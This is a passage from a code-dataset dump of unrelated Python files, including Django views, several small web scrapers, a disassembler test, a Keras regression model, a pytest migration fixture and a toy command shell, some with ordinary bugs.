ExecutionStatus.objects.get_or_create(status=settings.REFUSED)[0]\n if form.cleaned_data['new_reason']:\n taken_request.refuse_reason = RefuseReason.objects.get_or_create(reason=form.cleaned_data['new_reason'])[0]\n else:\n taken_request.refuse_reason = form.cleaned_data['reason']\n taken_request.executor = request.user\n taken_request.execution_or_refuse_date = timezone.now()\n taken_request.save()\n request.user.userprofile.taken_request = None\n request.user.userprofile.save()\n return redirect('requests')\n\n\nclass CreateReportTemplateView(generic.base.TemplateView, LoginRequiredMixin):\n template_name = 'requestsapp/report.html'\n\n def dispatch(self, request, *args, **kwargs):\n if (not self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists()):\n return redirect('requests')\n return super(CreateReportTemplateView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n \"\"\" Переопределение метода базового класса для добавления данных отчета в контекст шаблона. \"\"\"\n context = super(CreateReportTemplateView, self).get_context_data(**kwargs)\n \n start_date = self.request.GET.get('by_exexution_or_refuse_date_start', False)\n end_date = self.request.GET.get('by_exexution_or_refuse_date_end', False)\n\n # Для вывода параметров фильтрации на странице отчета.\n context['filters_amount'] = 0\n if start_date and end_date:\n context['by_exexution_or_refuse_date_start'] = datetime.datetime.strptime(\n self.request.GET.get('by_exexution_or_refuse_date_start'), '%Y-%m-%dT%H:%M')\n context['by_exexution_or_refuse_date_end'] = datetime.datetime.strptime(\n self.request.GET.get('by_exexution_or_refuse_date_end'), '%Y-%m-%dT%H:%M')\n context['filters_amount'] += 1\n if self.request.GET.get('by_creator', False):\n filtering_creator = USER.objects.get(pk=self.request.GET['by_creator'])\n context['filtering_creator'] = filtering_creator\n context['filters_amount'] += 1\n\n doneRequests2dList = []\n executors = USER.objects.filter(groups__name=settings.DEFAULT_EXECUTORS_GROUP_NAME)\n done_st = ExecutionStatus.objects.get_or_create(status=settings.DONE)[0]\n work_types = [wt for wt in WorkType.objects.all() if wt.requests.filter(execution_status=done_st).count() > 0]\n if len(executors) > 0 and len(work_types) > 0:\n # Строка с типами заявок.\n doneRequests2dList.append([' ', *[str(wt) for wt in work_types]])\n bottom_total_amount_row = [0 for t in work_types] + [0]\n for e in executors:\n half_of_rate = ' (пол ставки)' if e.userprofile.half_of_rate else ''\n # Первая ячейка строки -- логин, ФИО и статус ставки исполнителя.\n new_row_elements = [e.username + ' : ' + str(e.userprofile) + half_of_rate]\n executor_total_amount = 0\n for wt in work_types:\n # Первоначальная выборка выполненных исполнителем заявок определенного типа.\n done_by_executors_requests = wt.requests.filter(execution_status=done_st, executor=e)\n \n # Применение фильтров-параметров формирования отчета.\n done_by_executors_requests = filter_requests(done_by_executors_requests, self.request.GET)\n \n # Получение количества выполненных исполнителем заявок.\n if e.userprofile.half_of_rate:\n done_by_executors_amount = done_by_executors_requests.count() * 2\n else:\n done_by_executors_amount = done_by_executors_requests.count()\n new_row_elements.append(done_by_executors_amount)\n \n # Для получения общего количества выполненных исполнителем заявок.\n executor_total_amount += done_by_executors_amount\n\n new_row_elements.append(executor_total_amount)\n doneRequests2dList.append(new_row_elements)\n\n # Постепенное получение, приращение общего количества заявок по каждому типу заявок.\n bottom_total_amount_row = list(map(lambda total_figure, current_figure: total_figure +\n current_figure, bottom_total_amount_row, new_row_elements[1:]))\n\n doneRequests2dList.append([''] + bottom_total_amount_row)\n context['done_request_2d_list'] = doneRequests2dList\n context['types_amount'] = len(work_types)\n return context\n\n\n# delete_request есть только у диспетчеров.\n@login_required\n@permission_required('requestsapp.delete_request')\ndef add_new_auto(request, amount):\n equipment = Equipment.objects.first()\n for i in range(0, int(amount)):\n inventory = Inventory.objects.create(\n equipment=equipment, inventory_number='auto#{0}m'.format(str(datetime.datetime.now().minute)))\n Request.objects.create(\n execution_status=ExecutionStatus.objects.get(status=settings.WAITING_FOR_START),\n creator=request.user, applicant_profile=UserProfile.objects.last(),\n submission_date=timezone.now(), work_type=WorkType.objects.first(),\n description='auto_created#%s' % str(datetime.datetime.now()), inventory=inventory,\n location=Location.objects.first())\n return HttpResponse('successful')\n","sub_path":"requestsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568124100","text":"# -*- coding: utf-8 -*-\n\nimport pdfkit\nimport os\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\n# 获取标题列表\ndef get_title_list():\n soup = urlopen('http://www.yinwang.org')\n content = BeautifulSoup(soup.read(), 'html.parser')\n title_list = []\n content_list = content.find_all('li', 'list-group-item')\n for text in content_list:\n title_list.append(text.get_text().strip())\n return title_list\n\n\n# 获取所有页面url\ndef get_url_list():\n soup = urlopen('http://www.yinwang.org')\n content = BeautifulSoup(soup.read(), 'html.parser')\n menu_tag = content.find_all(class_='list-group-item')\n urls = []\n for li in menu_tag:\n url = \"http://www.yinwang.org\" + li.a.get('href')\n urls.append(url)\n return urls\n\n# 将html页面保存到本地\ndef saveHtml(file_name, file_content):\n fp = open(file_name, \"w+b\")\n fp.write(file_content)\n fp.close()\n\n# 将博客转化为pdf文件\ndef savePDF(url, file_name):\n options = {\n 'page-size': 'A4',\n 'zoom':'2.5'\n }\n pdfkit.from_url(url, file_name, options = options)\n\n# 将当前所有文章url保存到文件里\ndef saveCurrUrList(urls, filename, mode = 'a'):\n file = open(filename,mode)\n for i in range(len(urls)):\n file.write(str(urls[i] + '\\n'))\n file.close()\n\nif __name__ == '__main__':\n urls = get_title_list()\n for i in range(73, 77):\n urls = get_url_list()\n title_list = get_title_list()\n print(title_list[i])\n soup = urlopen(urls[i])\n content = BeautifulSoup(soup.read(), 'html.parser')\n saveHtml(os.getcwd() + '/html/' + title_list[i] + '.html', content.encode())\n savePDF(urls[i], os.getcwd() + '/pdf/' + title_list[i] + \".pdf\")\n\n\n\n\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290056277","text":"from urllib.request import urlopen, Request\nimport csv\nfrom bs4 import BeautifulSoup\nfrom geopy.geocoders import Nominatim\ngeolocator = Nominatim(user_agent=\"hacktheworld\")\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) ' \n 'AppleWebKit/537.11 (KHTML, like Gecko) '\n 'Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}#{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n\nreg_url = \"https://ccfoodbank.org/food-locator/\"\nreq = Request(url=reg_url, headers=headers) \nresponse = urlopen(req).read() \n\nsoup = BeautifulSoup(response, features=\"lxml\")\ndivs = soup.find(id=\"storeLocator__storeList\").find_all(\"div\")\nf = open(\"./food_center_info/a.txt\", 'w')\nf.write(str(soup))\nwith open(\"./food_center_info/supermarket.csv\", 'w') as f:\n csvwriter = csv.writer(f)\n\n csvwriter.writerow([\"Name\", \"Address\" , \"Phone #\",\"Open Time\"])\n for div in divs:\n\n name = row.find({\"name\":\"store-location\"}).text\n address = row.find({\"name\":\"store-address\"}).text\n location = geolocator.geocode(address)\n tel = row.find({\"name\":\"store-tel\"}).text\n time = row.find({\"name\":\"store-description\"}).text\n print(name)\n \n csvwriter.writerow([name,address,location.latitude,location.longitude,tel, time])","sub_path":"cases_data/food_center_info/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"118971912","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom disasm import instruction_encoding\n\nimport unittest\n\n\nclass Test__LEA_8d(unittest.TestCase):\n\n def test_LEA_8d(self):\n buf = b\"\\x48\\x8d\\x45\\xe7\"\n instruction = instruction_encoding.decode(buf)\n self.assertEqual(str(instruction), \"LEA RAX, [RBP -19h]\")\n self.assertEqual(len(instruction), 4)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test8d.py","file_name":"test8d.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"510470050","text":"import json\nimport os\nimport cv2\nimport numpy as np\nimport random\nimport pprint\nimport sys\nfrom os.path import dirname,realpath\n\ndir_path = dirname(realpath(__file__))\n\nproject_path = realpath(dir_path + \"/..\")\n\nlibs_dir_path = project_path + \"openpose\"\nsys.path.append(libs_dir_path)\n\n#from openpose import poseEstimation\n\ndef get_frames(video_path, frames_per_step, segment, im_size, sess):\n\n #load video and qcquire its parameters using opencv\n\n video = cv2.VideoCapture(video_path)\n fps = video.get(cv2.CAP_PROP_FPS)\n video.set(cv2.CAP_PROP_POS_AVI_RATIO,1)\n max_len = video.get(cv2.CAP_PROP_POS_MSEC) / 1000\n\n # check segment consistency\n\n if max_len < segment[1]:\n\n segment[1] = max_len\n\n #define start frame\n\n central_frame = (np.linspace(segment[0], segment[1], num=3)) / 1000 *fps\n\n start_frame = central_frame[1] - frames_per_step / 2\n\n # for every frame in the clip extract frame, compute pose and insert the\n # result in the array\n\n frames = np.zeros(shape=(frames_per_step, im_size, im_size, 3), dtype=float)\n\n\n for z in range(frames_per_step):\n\n frame = start_frame + z\n video.set(1, frame)\n\n ret, im = video.read()\n\n pose_frame = poseEstimation.compute_pose_frame(im, sess)\n\n res = cv2.resize(pose_frame, dsize(im_size,im_size),\n interpolation=cv2.INTER_CUBIC)\n\n frames[z,:,:,:] = res\n\n return frames\n\ndef read_clip_label(Batch_size,frames_per_step,im_size,sess):\n batch = np.zeros(shape=(Batch_size,frames_per_step,im_size,im_size,3),dtype=float)\n labels = np.zeros(shape=(Batch_size),dtype=int)\n\n for s in range(Batch_size):\n entry_name = random.choice(list(Json_dick_keys()))\n training_entry = random.choice(Json_dict[entry_name])\n\n path = entry_to_path[entry_name]\n\n segment = training_entry['millisecond']\n\n clip = get_frrames(path_frames_per_step,segment,im_size,sess)\n batch[s,:,:,:,:] = clip\n labels[s] = label_to_id[training_entry['label']]\n\n return batch,labels\n","sub_path":"dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568755134","text":"import inspect\n\nfrom tinychain import op, ref\nfrom tinychain.state import State\nfrom tinychain.util import form_of, to_json, uri, Context, URI\nfrom tinychain.value import Nil, Value\n\nfrom . import resolve_class\n\n\nEMPTY = inspect.Parameter.empty\n\n\nclass Method(object):\n __uri__ = uri(op.Op)\n\n def __init__(self, header, form, name):\n self.header = header\n self.form = form\n self.name = name\n\n def __json__(self):\n return {str(uri(self)): to_json(form_of(self))}\n\n def dtype(self):\n return self.__class__.__name__\n\n\nclass Get(Method):\n __uri__ = uri(op.Get)\n\n def __call__(self, key=None):\n rtype = inspect.signature(self.form).return_annotation\n rtype = resolve_class(self.form, rtype, Nil)\n return rtype(ref.Get(uri(self.header).append(self.name), key))\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n\n if len(parameters) < 1 or len(parameters) > 3:\n raise ValueError(f\"{self.dtype()} takes 1-3 arguments: (self, cxt, key)\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n key_name = \"key\"\n if len(parameters) == 3:\n key_name, param = parameters[2]\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n\n cxt._return = self.form(*args) # populate the Context\n return key_name, cxt\n\n\nclass Put(Method):\n __uri__ = uri(op.Put)\n\n def __call__(self, key, value):\n return ref.Put(uri(self.header).append(self.name), key, value)\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n if len(parameters) > 4:\n raise ValueError(\"a PUT method has a maximum of four parameters\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n key_name = \"key\"\n value_name = \"value\"\n\n if len(parameters) == 3:\n name, param = parameters[2]\n if name == key_name:\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n elif name == value_name:\n dtype = resolve_class(self.form, param.annotation, State)\n args.append(dtype(URI(value_name)))\n else:\n raise ValueError(\n f\"a PUT method with three parameters must specify either 'key' or 'value', not '{name}'\")\n\n if len(parameters) == 4:\n key_name, param = parameters[2]\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n\n value_name, param = parameters[3]\n dtype = resolve_class(self.form, param.annotation, State)\n args.append(dtype(URI(value_name)))\n\n cxt._return = self.form(*args)\n return key_name, value_name, cxt\n\n\nclass Post(Method):\n __uri__ = uri(op.Post)\n\n def __call__(self, **params):\n rtype = inspect.signature(self.form).return_annotation\n rtype = resolve_class(self.form, rtype, Nil)\n return rtype(ref.Post(uri(self.header).append(self.name), **params))\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n\n if len(parameters) == 0:\n raise ValueError(f\"{self.dtype()} has at least one argument: (self, cxt, name1=val1, ...)\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n kwargs = {}\n for name, param in parameters[2:]:\n dtype = resolve_class(self.form, param.annotation, State)\n kwargs[name] = dtype(URI(name))\n\n cxt._return = self.form(*args, **kwargs)\n return cxt\n\n\nclass Delete(Method):\n __uri__ = uri(op.Delete)\n\n def __call__(self, key=None):\n return ref.Delete(uri(self.header).append(self.name), key)\n\n def __form__(self):\n return Get.__form__(self)\n\n\ndef _check_context_param(parameter):\n _name, param = parameter\n if param.annotation == EMPTY or param.annotation == Context:\n pass\n else:\n raise ValueError(\n f\"a method definition takes a transaction context as its second parameter, not {param.annotation}\")\n","sub_path":"client/tinychain/reflect/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595703480","text":"import logging\nimport argparse\nimport pickle\nimport math\nfrom tqdm import tqdm\nimport numpy as np\nfrom keras.layers import Input, CuDNNLSTM, LSTM, BatchNormalization, Activation, Dense, Dropout\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nfrom keras.models import Model\nfrom keras.initializers import RandomNormal, Orthogonal, Ones, Zeros, glorot_uniform\nfrom keras.utils import plot_model\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import metrics\nfrom utils import custom_load, custom_load_multitask, mean_absolute_percentage_error\n\ndef create_model(\n input_dim,\n dnn_layer,\n lambda_c=1,\n lambda_w=1,\n dropout_rate=0.1,\n activation='relu',\n optimizer=Adam(lr=0.001)):\n\n assert(dnn_layer[-1] == 1)\n dnn_input_layer = Input((input_dim,), name=\"input\")\n dnn_output_layer = dnn_input_layer\n for dim in dnn_layer:\n dnn_output_layer = Dense(dim, kernel_initializer=RandomNormal(mean=0.0, stddev=0.05), kernel_regularizer=l2(lambda_w), bias_regularizer=l2(lambda_w))(dnn_output_layer)\n dnn_output_layer = Dropout(dropout_rate)(dnn_output_layer)\n dnn_output_layer = BatchNormalization()(dnn_output_layer)\n dnn_output_layer = Activation(activation)(dnn_output_layer)\n\n model = Model(inputs=dnn_input_layer, outputs=dnn_output_layer, name=\"DNN_REGRESSOR\")\n model.compile(optimizer=optimizer, loss='mse', loss_weights=[lambda_c])\n return model\n\ndef main(args):\n X_train, y_train, X_test, y_test = custom_load_multitask(\n train='./data/1234.csv', test='./data/2345.csv', label_length=1,\n min_matches_cnt=5, label='damage_dealt_avg')\n\n logging.info('Train Dataset shape: %s' % str(X_train.shape))\n logging.info('Test Dataset shape: %s' % str(X_test.shape))\n\n\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n\n model = create_model(\n input_dim=X_train.shape[1],\n dnn_layer=[20, 10, 1],\n lambda_c=10,\n lambda_w=5,\n dropout_rate=0.5,\n optimizer=Adam(lr=0.01),\n activation='relu',)\n\n model.summary()\n\n model.fit(\n x=X_train, y=y_train,\n validation_data=(X_test, y_test),\n batch_size=32,\n epochs=150,\n verbose=1,)\n \n error = mean_absolute_percentage_error(y_test, model.predict(X_test))\n print(\"MAPE: %f\" % error)\n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"[%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./logs/tuning.log\"),\n logging.StreamHandler()\n ],\n level=logging.INFO\n )\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file_path', type=str, default=\"./data/data-common-0-43000.csv\")\n args = parser.parse_args()\n \n main(args)\n","sub_path":"src/DNN_regressor.py","file_name":"DNN_regressor.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251657915","text":"from bs4 import BeautifulSoup\r\nimport urllib.request\r\nimport time\r\nimport datetime\r\n\r\ndata_filename = 'queue_data_' + str(datetime.datetime.now().date()) + '.csv'\r\nurl = \"http://reporting.int.godaddy.com/wallboard/ccqueues-international.aspx?UTCOffset=1&Skilltargets=5007|10176\"\r\ntime_limit = datetime.time(17, 30, 0, 0)\r\nrefresh_rate = 15 #seconds\r\n\r\nprint('info : current time is ' + str(datetime.datetime.now()))\r\nprint('info : file name is ' + data_filename)\r\n\r\nwhile datetime.datetime.time(datetime.datetime.now()) < time_limit:\r\n try:\r\n page = urllib.request.urlopen(url)\r\n except urllib.error.URLError:\r\n print('error: url could not be reached')\r\n break\r\n\r\n # parse the page with beautifulsoup\r\n soup = BeautifulSoup(page, 'html.parser')\r\n\r\n # Get the values from the html tab\r\n name_box = [my_tag.text for my_tag in soup.find_all('td', attrs={'class': 'statWhite'})]\r\n\r\n # Let's write to the file\r\n temporary_string = (str(name_box[0]) + ',' + str(name_box[1]) + ',' +\r\n str(name_box[2]) + ',' + str(datetime.datetime.now()))\r\n\r\n file = open(data_filename, 'a')\r\n file.write(temporary_string + '\\n')\r\n print('info : ' + temporary_string)\r\n file.close()\r\n \r\n time.sleep(refresh_rate)\r\n\r\n# close the file\r\nprint('info : time limit exceeded')\r\nprint('info : open graph.py to generate report')\r\n\r\ninput()","sub_path":"queue/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317837373","text":"import sys\nimport json\n\n\nif __name__ == '__main__':\n scanId1 = int(sys.argv[1])\n key = \"scanId\"\n #print(scanId)\n file = open(\"./site-assets.json\",\"rt\")\n #file = open(\"./site-assets1.json\",\"rt\")\n content = file.read()\n content1 = json.loads(content)[\"resources\"]\n file.close()\n #print(content)\n for obj1 in content1:\n for obj2 in obj1[\"history\"]:\n if key in obj2.keys(): \n if (((obj2[\"scanId\"] == scanId1 ) and (obj1[\"vulnerabilities\"][\"critical\"] > 0)) or ((obj2[\"scanId\"] == scanId1 ) and (obj1[\"vulnerabilities\"][\"severe\"] > 0)) ):\n print(obj1[\"ip\"])","sub_path":"R7_Scanning/generate_report/files/parse-json.py","file_name":"parse-json.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79870213","text":"from os.path import basename\nfrom PIL.ImageTk import PhotoImage\nfrom pyviews.core.ioc import inject\nfrom pykomcore.grid.geometry import ColumnsSetup, CanvasGridGeometry\nfrom pykomcore.grid.viewmodel import GridViewModel, ItemViewModel, ColumnViewModel\n\nclass PanelViewModel(GridViewModel):\n def __init__(self):\n super().__init__()\n self.path = None\n self.grid = _create_files_grid()\n\ndef _create_files_grid():\n geometry = CanvasGridGeometry(ColumnsSetup([16, \"*\", 70]), 25)\n columns = [\n ColumnViewModel('image', PhotoImage, ''),\n ColumnViewModel('name'),\n ColumnViewModel('size')\n ]\n\n return GridViewModel(geometry, columns, 'name')\n\nclass EntryViewModel(ItemViewModel):\n def __init__(self, path, name=None):\n super().__init__()\n self.name = name if name else basename(path)\n self.path = path\n self.size = None\n self.is_dir = False\n self._add_key('image')\n\n @property\n @inject('get_icon')\n def image(self, get_icon):\n return get_icon(self.path)\n\n @property\n def search_key(self):\n return self.name\n","sub_path":"src/plugins/files/viewmodel/viewmodel.py","file_name":"viewmodel.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514422063","text":"from setuptools import setup, find_packages\nimport glob\nimport re\n\ndef requires():\n \"\"\" gets packages from requirements.txt \"\"\"\n with open('requirements.txt') as infile:\n return infile.read().splitlines()\n\n## Auto-update ipyrad version from git repo tag\n# Fetch version from git tags, and write to version.py.\n# Also, when git is not available (PyPi package), use stored version.py.\nINITFILE = \"PIED/__init__.py\"\nCUR_VERSION = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n open(INITFILE, \"r\").read(),\n re.M).group(1)\n\nsetup(\n name=\"PIED\",\n version=CUR_VERSION,\n url=\"https://github.com/isaacovercast/PIED\",\n author=\"Isaac Overcast\",\n author_email=\"isaac.overcast@gmail.com\",\n description=\"Phylogeographic Temporal Analysis\",\n long_description=open('README.md').read(),\n packages=find_packages(), \n install_requires=requires(),\n entry_points={\n 'console_scripts': [\n 'PIED = PIED.__main__:main',\n ],\n },\n license='GPL',\n classifiers=[\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.7',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476288756","text":"from typing import Optional\n\nimport pytest\nfrom django.db import DEFAULT_DB_ALIAS\n\n\n@pytest.fixture()\ndef migrator_factory(request, transactional_db, django_db_use_migrations):\n \"\"\"\n Pytest fixture to create migrators inside the pytest tests.\n\n How? Here's an example.\n\n .. code:: python\n\n @pytest.mark.django_db\n def test_migration(migrator_factory):\n migrator = migrator_factory('custom_db_alias')\n old_state = migrator.apply_initial_migration(('main_app', None))\n new_state = migrator.apply_tested_migration(\n ('main_app', '0001_initial'),\n )\n\n assert isinstance(old_state, ProjectState)\n assert isinstance(new_state, ProjectState)\n\n Why do we import :class:`Migrator` inside the fixture function?\n Otherwise, coverage won't work correctly during our internal tests.\n Why? Because modules in Python are singletons.\n Once imported, they will be stored in memory and reused.\n\n That's why we cannot import ``Migrator`` on a module level.\n Because it won't be caught be coverage later on.\n \"\"\"\n from django_test_migrations.migrator import Migrator # noqa: WPS433\n\n if not django_db_use_migrations:\n pytest.skip('--nomigrations was specified')\n\n def factory(database_name: Optional[str] = None) -> Migrator:\n migrator = Migrator(database_name)\n request.addfinalizer(migrator.reset) # noqa: PT021\n return migrator\n return factory\n\n\n@pytest.fixture()\ndef migrator(migrator_factory): # noqa: WPS442\n \"\"\"\n Useful alias for ``'default'`` database in ``django``.\n\n That's a predefined instance of a ``migrator_factory``.\n\n How to use it? Here's an example.\n\n .. code:: python\n\n @pytest.mark.django_db\n def test_migration(migrator):\n old_state = migrator.apply_initial_migration(('main_app', None))\n new_state = migrator.apply_tested_migration(\n ('main_app', '0001_initial'),\n )\n\n assert isinstance(old_state, ProjectState)\n assert isinstance(new_state, ProjectState)\n\n Just one step easier than ``migrator_factory`` fixture.\n \"\"\"\n return migrator_factory(DEFAULT_DB_ALIAS)\n","sub_path":"django_test_migrations/contrib/pytest_plugin.py","file_name":"pytest_plugin.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295183076","text":"#import colorama\nimport sys \nimport os\nclass bcolors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n CEND = '\\33[0m'\n CBOLD = '\\33[1m'\n CITALIC = '\\33[3m'\n CURL = '\\33[4m'\n CBLINK = '\\33[5m'\n CBLINK2 = '\\33[6m'\n CSELECTED = '\\33[7m'\n CBLACK = '\\33[30m'\n CRED = '\\33[31m'\n CRED2 = '\\93[0m'\n CGREEN = '\\33[32m'\n CYELLOW = '\\33[33m'\n CBLUE = '\\33[34m'\n CVIOLET = '\\33[35m'\n CBEIGE = '\\33[36m'\n CWHITE = '\\33[37m'\n CBLACKBG = '\\33[40m'\n CREDBG = '\\33[41m'\n CGREENBG = '\\33[42m'\n CYELLOWBG = '\\33[43m'\n CBLUEBG = '\\33[44m'\n CVIOLETBG = '\\33[45m'\n CBEIGEBG = '\\33[46m'\n CWHITEBG = '\\33[47m'\n CGREY = '\\33[90m'\n CRED2 = '\\33[91m'\n CGREEN2 = '\\33[92m'\n CYELLOW2 = '\\33[93m'\n CBLUE2 = '\\33[94m'\n CVIOLET2 = '\\33[95m'\n CBEIGE2 = '\\33[96m'\n CWHITE2 = '\\33[97m'\n CGREYBG = '\\33[100m'\n CREDBG2 = '\\33[101m'\n CGREENBG2 = '\\33[102m'\n CGREENB3 = '\\93[1m'\n CYELLOWBG2 = '\\33[103m'\n CBLUEBG2 = '\\33[104m'\n CVIOLETBG2 = '\\33[105m'\n CBEIGEBG2 = '\\33[106m'\n CWHITEBG2 = '\\33[107m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\nwelcome = print(\"\\x1b[93;1mwelcome\\x1b[0m\") \nprint(bcolors.CVIOLETBG + \"_____________________\\x1b[0m\")\n \n#def Err(command):\n #print(bcolors.CRED2 +command+\" was not found...\" + bcolors.CRED2)\ndef name(string):\n print(string)\ndef newLine():\n pointer = input(\">\")\nwhile True == True:\n\n pointer = input(\">\")\n \n if pointer == \"user\":\n class user:\n name = input('what is your user name:'), \n password = input(\"what is your password:\")\n print(\"\\x1b[92;1maccount information was made!\\x1b[0m\") \n elif pointer == \"self\":\n print(\"\\x1b[92;1moutput >>>\\x1b[0m\")\n print(user.name)\n \n elif pointer == \"user -r -p\":\n user.password = input(\"resest password>\")\n print(\"\\x1b[92;1mpassword was switched!\\x1b[0m\")\n \n elif pointer == \"user -r\":\n user.name = input(\"reset name>\")\n user.password = input(\"reset password>\")\n print(\"\\x1b[92;1maccount information reset!\\x1b[0m\") \n\n elif pointer == \"--v\":\n print(bcolors.OKBLUE + \"VERSION:\" + bcolors.BOLD + \"\\x1b[93;1mdev 1.0.0\\x1b[0m\") \n \n elif pointer == \"clear\":\n os.system(\"clear\")\n print(\"\\x1b[93;1mwelcome to a new page\\x1b[0m\")\n print(bcolors.CVIOLETBG + \"_____________________\\x1b[0m\")\n \n elif pointer == \"MAKE_DIR\" or pointer == \"makeDIR\":\n os.system(\"mkdir dir\")\n name = input(\"name file>\")\n os.rename(\"dir\", name)\n print(\"\\x1b[92;1mfolder \"+name+\" was created!\\x1b[0m\")\n\n elif pointer == \"CHANGE_wd\":\n name = input(\"what directory>\")\n os.chdir(name)\n current = os.getcwd()\n pathNow = str(current).split(\"/\")[4]\n print(\"\\x1b[92;1myour working directory is \"+pathNow+\"\\x1b[0m\") \n \n elif pointer == \"SHOW_F\":\n print(\"\\x1b[92;1m output>>>\\x1b[0m\")\n cwd = os.getcwd()\n files = os.listdir(cwd)\n print(files)\n \n elif pointer == \"--help\":\n with open('helper.txt', 'r') as f:\n for line in f:\n print(line, end='') \n #random stuff \n elif pointer == \"Hello\":\n print(\"Hello, how are you\")\n elif pointer == \"Hello who are you?\":\n print(\"I am you...\")\n elif pointer == \"I'm bad\":\n print(\"I'm sorry ):\")\n elif pointer == \"I'm good\":\n print(\"Im glad to here that (:\")\n \n elif pointer == '':\n newLine = True\n else:\n print(\"NOT FOUND\")\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"472921479","text":"import requests\nimport os\nimport argparse\nimport re\nfrom frequency import FrequencyCreator, ArtistFrequency\nfrom db.db import *\nfrom bs4 import BeautifulSoup as bs\n\ndefaults = {\n 'api_token': os.environ.get(\"GENIUS_API_KEY\"),\n 'root_api_url': os.environ.get(\"GENIUS_ROOT_API_URL\")\n}\n\n\nclass GeniusAPI:\n def __init__(self, artist):\n self._endpoint = defaults['root_api_url'] + '/search'\n self._headers = {'Authorization': 'Bearer ' +\n defaults['api_token']}\n self._artist = artist\n\n def get_lyrics(self):\n page = 1\n while page < 8:\n data = {'q': self._artist, 'page': page}\n api_response = requests.get(self._endpoint, data=data, headers=self._headers).json()\n for potential_song in api_response['response']['hits']:\n if self._artist.lower() in potential_song['result']['primary_artist']['name'].lower():\n song_found = potential_song\n song_url = song_found['result']['url']\n try:\n lyrics_to_save = self.scrape_lyrics(song_url)\n self.write_to_dir(lyrics_to_save,\n song_found['result']['title'], self._artist)\n except:\n print('could not process lyrics for ' + song_found['result']['title'] + ' with url ' + song_url)\n continue\n\n page += 1\n print('All Songs for {} have been found. Program is now calculating the frequency of all words...'.format(\n self._artist))\n db = Mongo('lyrics-db')\n songs_in_db = 